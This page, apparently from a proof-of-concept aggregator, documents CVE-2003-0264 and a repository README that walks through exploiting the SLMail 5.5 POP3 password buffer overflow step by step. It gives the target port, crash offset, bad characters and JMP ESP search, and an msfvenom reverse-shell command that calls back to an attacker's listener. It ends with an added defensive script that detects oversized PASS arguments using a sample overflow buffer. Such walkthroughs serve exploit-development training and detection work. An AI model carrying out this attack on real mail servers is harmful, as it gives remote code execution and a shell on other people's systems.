Related vulnerability
Title:
SLMail security vulnerability
(CVE-2003-0264)
Description: SLMail version 5.1.0.4420 contains a security vulnerability. Remote attackers can execute arbitrary code via (1) an overlong EHLO argument in slmail.exe, (2) an overlong XTRN argument in slmail.exe, (3) an overlong string in POPPASSWD, or (4) an overlong password in the POP3 server.
Description
Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3
Introduction
# CVE-2003-0264_EXPLOIT
Buffer Overflow in Seattle Lab Mail (SLmail) 5.5 - POP3
*Simple stack-based buffer overflow, step by step*
# 1) Fuzz the Application

In the very first step we fuzz the application with a simple SPIKE script, while SLMail is attached to (and running under) Immunity Debugger.

*More on SPIKE: https://resources.infosecinstitute.com/topic/intro-to-fuzzing/*

A simple SPIKE script named spike_fuzz.spk is included. We run it against the application with:

```
line_send_tcp 192.168.1.117 110 spike_fuzz.spk
```

where 192.168.1.117 is the IP of the target machine running SLMail, which listens on port 110.

*Meanwhile, if we look at Immunity, we see that the application has crashed.*

# 2) PoC for Replicating the Crash

Now we create a Python PoC that replicates the crash and determines the number of bytes at which the application crashes:

```
python poc_crash.py
```

# 3) Finding the Offset

To find the offset we use Metasploit's pattern tools:

1. First generate a pattern
2. Note the EIP
3. Query that EIP and the pattern length with MSF to find the offset

```
msf-pattern_create -l 2700
```

*In poc_offset.py we use this pattern as our overflow buffer.*

```
python poc_offset.py
```

*At this point we also note the EIP value in Immunity where the application has crashed and paused.*

EIP is 39694438

To find the offset:

```
msf-pattern_offset -l 2700 -q 39694438
```

*The offset is 2606, meaning 2606 bytes are sent before we reach EIP; EIP itself is 4 bytes long.*
# 4) Controlling the EIP

Now we try to overwrite EIP with four B's, i.e. in Immunity we should see 42424242 (hex for four B's):

```
python poc_eip_control.py
```

*And now we check Immunity.*

# 5) Finding Bad Characters

To keep this simple and short: you can run the poc_badchars.py script and find the bad characters yourself.

*This application has two bad characters (which are also the default ones). When we run poc_badchars.py the first time, we see that the character \x0a acts up, so we remove it from our bad-chars payload and run the script again. The second time we see that the character \x0d is skipped, so this is our second bad char and we remove it from the payload as well. When we run the script a third time, everything is clean.*

Bad chars are: \x00\x0a\x0d
(null byte, line feed, carriage return)

```
python poc_badchars.py
```
# 6) Finding the Right Module and Address

First we find the right module using Mona's module listing in Immunity. slmfc.dll is the most appropriate candidate, as it has no memory protections.

Now we find a JMP ESP address in this DLL. This address will be written to EIP so that we redirect program execution to ESP, which results in the execution of our shellcode.

```
!mona find -s "\xff\xe4" -m slmfc.dll
```

(\xff\xe4 is the opcode for JMP ESP)

From the 19 pointer addresses we choose the first one.
# 7) Dropping a Shell

Now we put all this together and drop a shell:

1. Generate the shellcode (excluding bad chars)
2. Add the address we found (remember little endian)
3. Assemble the buffer: padding, return address, some NOP sled, shellcode
4. We have a shell

*Let's quickly generate shellcode using msfvenom:*

```
msfvenom -p windows/shell_reverse_tcp LHOST=<listening-ip> LPORT=<listening-port> EXITFUNC=thread -f py -a x86 -b "\x00\x0a\x0d"
```

*We put everything together in the exploit.py file.*

*This time we run SLMail without Immunity and listen for incoming connections at the same time.* Once that is done, we run the final exploit.py script.

**EXCELLENT, WE HAVE A SHELL!**
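From the defender's side, the overflow walked through above is visible on the wire as a POP3 `PASS` argument that is thousands of bytes long and carries non-printable bytes and NOP padding. The following detection check is an added example, not part of this repository: it scans constructed POP3 client command lines and flags those shaped like the step 7 buffer. The `MAX_PASS_LEN` threshold and the `SAMPLE_SESSION` data are constructed for illustration.

```python
import re

# Constructed defender heuristic, not a value from the README: RFC 1939 does
# not bound PASS length, but reaching the saved return address already takes
# 2606 bytes, so anything remotely near that is not a human password.
MAX_PASS_LEN = 256
NOP_RUN = re.compile(rb"\x90{8,}")  # fragment of a NOP sled (step 7 padding)


def inspect_pop3_command(raw: bytes) -> dict:
    """Classify one client command line from a POP3 session capture.

    Returns the verb, the argument length and a list of reasons the line
    looks like an overflow attempt; an empty list means it looks benign.
    """
    line = raw.rstrip(b"\r\n")
    verb, _, arg = line.partition(b" ")
    reasons = []
    if verb.upper() == b"PASS":
        if len(arg) > MAX_PASS_LEN:
            reasons.append(f"PASS argument is {len(arg)} bytes (> {MAX_PASS_LEN})")
        if any(b < 0x20 or b > 0x7E for b in arg):
            reasons.append("non-printable bytes in PASS argument")
        if NOP_RUN.search(arg):
            reasons.append("run of 0x90 bytes (NOP sled) in PASS argument")
    return {"verb": verb.decode(errors="replace"), "arg_len": len(arg), "reasons": reasons}


def scan_session(lines) -> list:
    """Return the findings for every suspicious command in a session."""
    return [r for r in (inspect_pop3_command(l) for l in lines) if r["reasons"]]


# Constructed sample session: a normal login, then a PASS shaped like the
# overflow buffer (2606 bytes of padding, 4 bytes where EIP is overwritten,
# NOP padding, and 8 filler bytes standing in for the shellcode position).
SAMPLE_SESSION = [
    b"USER alice\r\n",
    b"PASS correct-horse-battery\r\n",
    b"STAT\r\n",
    b"USER test\r\n",
    b"PASS " + b"A" * 2606 + b"BBBB" + b"\x90" * 16 + b"\xcc" * 8 + b"\r\n",
]

if __name__ == "__main__":
    for finding in scan_session(SAMPLE_SESSION):
        print(finding)
```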
File snapshot
```
[4.0K] /data/pocs/101bdfc94413e1c63fb7a9520088db108ef3d5f2
├── [2.2K] exploit.py
├── [1.0K] LICENSE
├── [1.6K] poc_badchars.py
├── [ 532] poc_crash.py
├── [ 507] poc_eip_control.py
├── [3.1K] poc_offset.py
├── [4.9K] README.md
└── [ 152] spike_fuzz.spk
0 directories, 8 files
```
Notes
1. It is recommended to access the PoC through its original source first.
2. If the source has been removed or cannot be reached, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the PoC code for you; to support long-term maintenance, please consider paying for the local PoC. Thank you for your support.